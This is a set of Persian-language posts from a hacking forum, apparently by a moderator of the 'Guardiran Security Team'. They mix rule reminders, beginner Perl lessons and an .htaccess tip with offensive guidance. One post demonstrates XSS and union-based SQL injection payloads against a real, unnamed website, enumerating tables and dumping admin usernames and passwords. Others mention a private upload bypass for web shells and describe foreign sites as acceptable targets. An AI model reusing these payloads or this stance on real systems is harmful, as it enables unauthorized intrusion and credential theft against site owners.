MR.MSA

ببخشید دوست عزیز اما قسمتی در سایت وجود دارد به نام "پیام رسان" لطفا به قوانین احترام بزارید و این موارد رو در اونجا مطرح کنید! خب اینجا یک سوال خیلی مهم میمونه که شما چجوری php اپلود کردی؟ و نکته همینه که احتمالا سایت اصلا php ساپورت نمیکنه یک بایپس پرایوت دارم شاید بتونه کمک کنه

خب حتما نباید id باشه توی ویدئو های بعد اگه اشتباه نکنم تارگتی بود که id نداره و یک چیز دیگس اشکال نداره مراحل رو روی همون کار کنید هیچ فرقی نداره. نیازی نیست حتما id باشه مثلا میتونه userid یا product یا name یا news یا .... باشه. موفق باشید.

با سلام دوست عزیز فکر میکنم اصلا شل به صورت php خونده نمیشه و اینکه نیازی به اسپم نیست کسی که توی تاپیک پاسخی رو ارسال میکنه بعدشم به پست های بعدی توجه میکنه. دوست عزیز شل ها جوری نوشته میشن که اسمشون هر چی باشه فرقی نداره که اینجا هم چون اصلا فایل php ران نمیشه این مشکل رخ داده. در کنارش یک نکته مهم: این رو برای تمام دوستان میگم،‌ برای همینه که پیشنهاد میشه یک زبان برنامه نویسی رو کار کنید که توی درک مفاهیم تست و نفوذ مشکلی براتون پیش نیاد و بتونید تجزیه و تحلیل خوبی داشته باشید. در کنارش بگم که برای تست و نفوذ وب پیشنهاد من زبان php هست. موفق و پیروز باشید.

😐 دوست عزیز الان قضیه چه فرقی کرد؟ شما چرا دستی رو ول کردی رفتی سراغ ابزار! هیچ فرقی باهم ندارن بالاخره شما باید یه دستوراتی رو بلد باشید و بزنید برای همین پیشنهاد من یادگیری به صورت دستی هست چون توی روش دستی شما وابسته به یک ابزار یا سیستم عامل نیستی و میتونید متود ها و روش های پرایوت هم بزنی و میدونی دقیقا چیکار داری میکنی، فردا روزی یجا گفتن بیا این باگ رو ببند یا آموزشش بده شما فقط چند تا دستور sqlmap رو میخوای بگی؟ و نمیتونی بگی دقیقا چه مشکلی داره رخ میده منم نمیگم اصلا از ابزار استفاده نکنید ولی اصلا برای یک مبتدی خوب نیست ابزار فقط برای بالا بردن سرعت کاره و شما اول باید کامل آشنا باشی با روند کار امیدوارم نکاتی که گفتم رو توجه کنید موفق و پیروز باشید.

عملگر های محاسباتی و نکات رشته ای با سلام خدمت دوستان عزیز. قراره توی این پست به عملگر های محاسباتی بپردازیم و در کنارش چند نکته درمورد رشته ها رو بهتون آموزش بدم،‌ اول یه آشنایی با عملگر ها داشته باشیم که عملگر ها در واقع کاراکتری هایی هستند که یک سری کار ها رو برامون انجام میدن، حالا بریم سراغ مطالب. نکات رشته : \n : مثل اینتر زدن عمل میکنه و خط رو میشکنه. \t : یک تب میزنه \f : یک اینتر و بعد یک تب میزنه. \$ : دالر رو نشون میده. \\ : معادل یک بک اسلشه \" : دابل کوتیشن رو نشون میده توی یک استرینگ نکته: توجه داشته باشید که باید این ها رو بین دابل کوتیشن قرار بدید زمان چاپ کردن. مثال: # \n print "salam\nkhoobi?"; print "salam \n khoobi?"; # \t print "salam \t chetori?" print "Guardiran\t\tSecurity\t\tTeam"; print "Sql \t\n Injection"; # \f print "hi \f ali "; print "salam \f khoobi?"; # \$ print "var = \$salam"; print "20\$"; # \\ print "back slash : \\"; print "ali\\mohammad"; # \" print "salam \" ali \""; print "yor code= \"20\""; عملگر های محاسباتی : + - * / % ** جمع تفریق ضرب تقسیم باقیمانده توان مثال : print 2 + 2 ; # 4 print 3 - 2 ; # 1 print 5 * 2 ; # 10 print 4 % 3 ; # 1 print 2 ** 3; # 8 اولویت ها : اعداد منفی > پرانتز () > توان > ضرب و تقسیم >‌ جمع و تفریق print 10+10/2*4; print "\n"; print ((10+10)/2)*4;

با سلام کاربر محترم @zubeid1 دلیل محروم شدن شما از سایت اسپم کردن و به تذکرات توجه نکردنه! و اینو برای تمام دوستان میگم وقتی میخواید یک ابزار بنویسید حداقل اسم خود تیم رو درست بنویسید وگرنه جز ابزار های تیم نیست! چون حتی اسم تیم یا آدرس سایت هم قرار ندادید. Guardiran Security Team guardiran.org Guardiran موفق و پیروز باشید.

با سلام و عرض ادب دوست عزیز @Mr.Night اینا نصیحت نیست! اخطاره شما هم لطف کن انقدر ما رو به زحمت ننداز و تاپیک ها رو خراب نکن کپی برداری نشون میده خودتون مطلب رو بلد نیستید میتونید اونو بخونید و با توجه به چیزی که خوندید راهنمایی کنید. موفق باشید.

سلام ابتدا تشکر میکنم از @proxy و @KR0N0S برای دیسکورد میتونید این تاپیک رو مطالعه کنید: و برای آموزش Sql Injetion هم میتونید از پست هایی که @KR0N0S پیشنهاد دادن استفاده کنید و همونجور که @proxy گفتن بیاید دیسکورد به صورت آنلاین آموزش بدیم که تقریبا هر روز به صورت لایو تست و نفوذ انجام میدیم توی دیسکورد دوستان علاقمند دیگه هم میتونند بیان اونجا تا باهم کار کنیم. موفق و پیروز باشید.

درود چرا دوست عزیز میشه گفت هر جایی که ورودی کاربر چاپ بشه امکان وجود xss هست. مثلا ما یک ادرس داریم به این صورت : site.com/login.php?error=password is wrong! و مثلا خطای password is wrong رو توی پیج لاگین میده حالا فرض کنید بجای اون یک کد javascript بزنیم: site.com/login.php?error=<script>alert('guardiran')</script> حالا اگر اجرا بشه میگیم xss داره. و یا چند مثال دیگه بخوام بزنم زمانی که سایت یک نام کاربری رو از شما میگیره و همه جا اون اسم رو چاپ میکنه مثلا میگه خوش اومدی MR.MSA خب توی این حالت هم میتونید بجای یک نام درست از کد جاوا اسکریپتی استفاده کنید و همیشه هم توی url و کامنت گذاری نیست مثلا میتونید از طریق کوکی بعضی وقت ها از این باگ استفاده کنید یا از طریق ارسال درخواست post و... برای درک کد ها هم بهتره به js مسلط باشید. نکته دیگه اینکه برای آشنایی با انواع حملات xss مثل XSS Stored میتونید از مقالات Owasp هم استفاده کنید. برای آموزش این آسیب پذیری میتونید به این تاپیک مراجعه کنید: موفق و پیروز باشید.

درود ببنید میتونید تست کنید توی این آدرس [Hidden Content] که پارامتر دهی داشتیم همونجور که نوشته متود get و پارامتر آندرلاین که مراحل sql injection رو انجام بدید به صورت union based اگر نشد از آسیب پذیری blind sql injection استفاده کنید. موفق باشید.

نکات اولیه با سلام خدمت دوستان عزیز در این تاپیک میخوایم یک آشنایی کلی با متغیر ها و نکات اولیه زبان پرل بپردازیم. طریقه بستن دستورات: ما برای بستن دستورات در پرل از Semicolons ; استفاده میکنیم. فرمت فایل های پرل: همون جور که میدونید، فایل پروژه های هر زبان یک فرمت خاص خودشو داره که زبان پرل فرمت .pl هست و فایل ها رو باید با این فرمت ذخیره کنید. دستور Print: ما برای چاپ کردن یک مقدار مثلا یک String از دستور print میتونیم استفاده کنیم. مثال: print "Hello World!" ; print 'test' ; print 200 ; print 2.2 ; کامنت کردن: کامنت در واقع برای نوشتن یک یادداشت در پروژه شما هست، مثلا بنویسی چرا از چنین سیستمی در فلان قسمت استفاده کردی! که بعد از مثلا چند هفته کد رو دیدید گیج نشین! و یا توی پروژه های تیمی کامنت گذاری خیلی کمک میکنه، حتی در خیلی از پروژه های فریلنسرینگ برنامه نویسی اکثر پروژه ها باید کامنت گذاری خوبی داشته باشه!. کامنت ها هیچ تاثیری روی برنامه شما ندارن و کامنت کردن در زبان های مختلف فرق داره که در پرل با گذاشتن یک هشتگ (#) از اون به بعد کامنت به حساب میاد. مثال اول: # your comment مثال دوم: print "hello wolrd!"; # for test متغیر ها: برای تعریف متغیر ما سه دیتا تایپ اصلی رو داریم که در این پست به طور کلی بهشون میپردازیم: 1- Scalars با علامت دلار ($) تعریف میشه و میتونه مقادیر String، Int ، Float رو بگیره مثال: $var = "salam" ; #string $var2 = 20 ; #integer $var3 = 2.5 ; # float print $var ; print $var2 ; print $var3 ; 2- Arrays با علامت اتساین (@) تعریف میشه و در واقع لیستی از Scalar ها رو میگیره. مثال: @my_array = ( 2 , 2.5 , 'salam'); @array2 = ('hello','world'); @test = ('test1' , 200 , "test2" , "test3"); # for print (DataType: scalar) print "@my_array \n" ; print "@array2 \n"; print "@test \n" ; # or print "@my_array \n @array2 \n @test " 3- Hashes با علامت درصد (%) تعریف میشه و یک جفت هستن یعنی با یک کلید اون رو فراخوانی کنیم. مثال اول: %age = (ali, 25 , mohammad, 32); # or %age = ('ali', 25 , 'mohammad', 32); # print print "ali = $age{'ali'} \n"; print "mohammad = $age{'mohammad'} \n"; الان در واقع توی هش age ما یک ali داریم با مقدار 25 و یک mohammad با مقدار 32 . در خط ۲ و ۳ اومدیم اسم دو شخص رو گذاشتیم و مساویه با ، { اینجا دیگه سن ali و mohammad رو فراخوانی کردیم (به صورت scalar)‌ } مثال دوم: %age = (ali => 25 , mohammad => 32); # or %age = ('ali' => 25 , 'mohammad' => 32); # print print "ali = $age{'ali'} \n"; print "mohammad = $age{'mohammad'} \n"; در اینجا نتیجه با مثال قبل فرقی نداره اما میتونیم به این صورت هم hash ها رو تعریف کنیم. --------------------------------------- [+] این پست در صورت لزوم آپدیت خواهد شد. --------------------------------------- موفق و پیروز باشید.

آشنایی با زبان پرل ویژگی ها: سطح بالا مفسری سریع قابل اعتماد سرگرم کننده دارای CPAN (Componencive Perl Archive Network) قدرت گرفته از C/C++ , Unix shell, lisp , Basic و... کاربرد ها: اکسپلویت نویسی و تست و نفوذ طراحی سایت طراحی اپلیکیشن نظامی صنعتی تحقیقاتی طراحی بازی و... محیط های پیشنهادی برای پرل Kephra Padre نکته: همچنین میتونید از این لینک برای اجرای کد ها استفاده کنید. همچنین میتونیم از پرل در زبان های دیگه هم استفاده کنیم و توی تمامی پلتفرم ها قابل اجراست. در ضمن زبان برنامه نویسی پرل از قدرتمند ترین زبان های اکسپلویت نویسی هست و میشه گفت بدون شک در تست و نفوذ خیلی کاربرد داره. --------------------------------------------- [+] این پست در صورت لزوم بروز خواهد شد. --------------------------------------------- موفق و پیروز باشید.

نه بنده منظورم از تارگت منابع هست چون یک جورایی تبلیغات به حساب میاد و همونطور هم که خیلی از دوستان میدونن تارگت ایرانی زیاد قرار میگیره منم این بار جا به جا گفتم وگرنه تاپیک ایشون کاملا اسپم به حساب میاد و باید پیام خصوصی میدادن! چون باعث شد تاپیک خراب بشه. (الان فقط چهار تا پاسخ اسپم داریم توی این تاپیک) "9) هرگونه تبلیغ انواع سایت و بحث در مورد تیم های امنیتی دیگر اکیدا ممنوع می باشد."

با سلام دوست عزیز @MohsenMoghimi924 بهتره که لینک سایت های ایرانی رو قرار ندید.(چون تبلیغ محسوب میشه) و اینکه انقادات و پیشنهادات رو باید به صورت پیام خصوصی مطرح کنید وگرنه اسپم محسوب میشه و تاپیک خراب میشه! موفق باشید.

خب متاسفانه این امکان وجود نداره. بازم میتونید گوگل کنید ولی بعید میدونم چنین چیزی رو بتونید انجام بدید. موفق باشید.

با سلام خدمت دوستان عزیز گاردایران Perl در این تاپیک قراره زبان برنامه نویس پرل (perl) به صورت مقدماتی آموزش بدم. زبان پرل در تست و نفوذ خیلی کاربرد داره و میتونید درموردش توی گوگل مطالبی رو بخونید و بیشتر متوجه بشید. قوانین تاپیک: ۱- تمامی سوالات رو در انجمن پرسش و پاسخ بپرسید. ۲- تمامی پیشنهادات رو پی وی ارسال کنید. ۳- اگر قصد ارسال آموزش دارید ابتدا با بنده هماهنگ کنید. -------------------------------------------------------------------------------------------------------------------------------------------- موفق و پیروز باشید.

با سلام اگر منظورتون مثلا site.com/wp-includes هست که در بعضی سایت ها directory listing وجود داره خب با قرار داده یک قطعه کد ساده میشه جلوشو گرفت و به شما 403 یا Forbiden بده.که دیگه دایرکتوری لیستینگ بسته بشه و نمیشه جلوشو گرفت. مثلا توی فایل .htaccess سایت این کد رو قرار بدیم: Options All -Indexes موفق باشید.

با سلام، اول خیلی ممنون از توضیحات @SRX خب ببینید اول برای کارگاه باید بگم که درحال طراحیه برای چالش هم ما یک چالش رو نوشتیم و انشالله تا چند روز آینده شاید تاپیکش رو هم منتشر کردیم. نکته بعد اینکه برای کاربر های افتخاری همون جور که از اسمش پیداست مربوط به فعالیت نمیشه! از طرفی ارتقا رنک در انجمن با توجه به میزان سطح علمیتون هست هر چی سطح علمی بیشتری داشته باشید زود تر ارتقا میگیرید و با گذاشتن تاپیک های آموزشی و یا پاسخ به سوالات و پروژه های مختلف میتونید نشون بدید که سطح علمیتون به چه صورته. موفق باشید.

منظورتون اینه که سایت دسترسی بگیریم بدیم به شما؟ لطفا یکم بیشتر توضیح بدید.

خب شما ابزارتو معرفی کن نیازی نیست کلی وقت الکی بزاری و اینکه من نمیتونم برای تذکر به هر نفر یک چت بسازم چت هامم دیروز پر شد نشستم خالی کردم! و وقتی دوستانی که یک بار بهشون تذکر داده میشه رعایت نمیکنن و نیازه چند بار بگیم چه دلیلی داره هر بار چت باز کنم.

این حرفتون یعنی چی؟ وقتی یک چیزی رو نمیدونید نیازی به اسپم نیست. و اینکه وقتی @Sajy1384 یک پاسخ کامل رو میده نیازی نیست شما بیای اسپم کنی مگر اینکه پاسخ کامل تری داشته باشی. لطفا قوانین رو بخون و رعایت کن. دلیل تذکر های منم اینه که باید همه به قوانین احترام بزارن و بهشون عمل کنن.

با سلام دوست عزیز Zed با تشکر از فعالیت شما، اما لطفا قبل از فعالیت قوانین انجمن رو مطالعه بفرمایید. پسورد تمامی فایل های زیپ باید گاردایران باشد. موفق باشید.

با سلام ببخشید اما کار کردن روی تارگت ایرانی در انجمن تیم امنیتی گاردایران ممنوع میباشد لطفا این مورد رو از این به بعد توجه داشته باشید.

سوال پرسیدن که عیب نیست! سوال خوبی هم پرسیدید شاید بقیه دوستان هم این سوال رو داشته باشند! خب ببینید شما خودتون میتونید تست کنید مثلا من اومدم یکی از لینک های سایت رو که پارامتر دهی انجام شده بود انتخاب کردم یعنی این : [Hidden Content] خب متغیر name_group داره تایتل رو مشخص میکنه که بعد از تست کردن متوجه باگ XSS شدم: [Hidden Content](%27XSS%27)%3C/script%3E بعد به متغیر id_group دقت کنید که احتمال وجود SQL Injection هم هست و بعد از تست کردن متوجه وجود باگ شدم: [Hidden Content],2,3,4,5,6,7,database(),9,10,11,12,13,14--&name_group=s لینک های دیگر: Tables: [Hidden Content],2,3,4,5,6,7,group_concat(table_name,%27%3Cbr%3E%27),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()--&name_group=s Columns: [Hidden Content],2,3,4,5,6,7,group_concat(column_name,%27%3Cbr%3E%27),9,10,11,12,13,14+from+information_schema.columns+where+table_name=%27admin%27--&name_group=s Informations: [Hidden Content],2,3,4,5,6,7,group_concat(user,0x3a,pass,%27%3Cbr%3E%27),9,10,11,12,13,14+from+admin--&name_group=s موفق و پیروز باشید.

با سلام دوست عزیز این دلیل نمیشه که قوانین رو نقض کنید. بالا بردن مهارت کار خیلی خوبه، اما نه روی تارگت ایرانی و اونم در انجمن گاردایران! در کنار اینکه قوانین رو زیر پا میزارید برای خودتون خیلی مشکل ساز میشه! ما تارگت خارجی آسیب پذیر زیاد داریم، حتی میتونید از چلنج های سایت هایی مثل hackthebox.eu ، hackthissite.org و root-me.org استفاده کنید که در بالا بردن مهارت عالی عمل میکنند. موفق و پیروز باشید.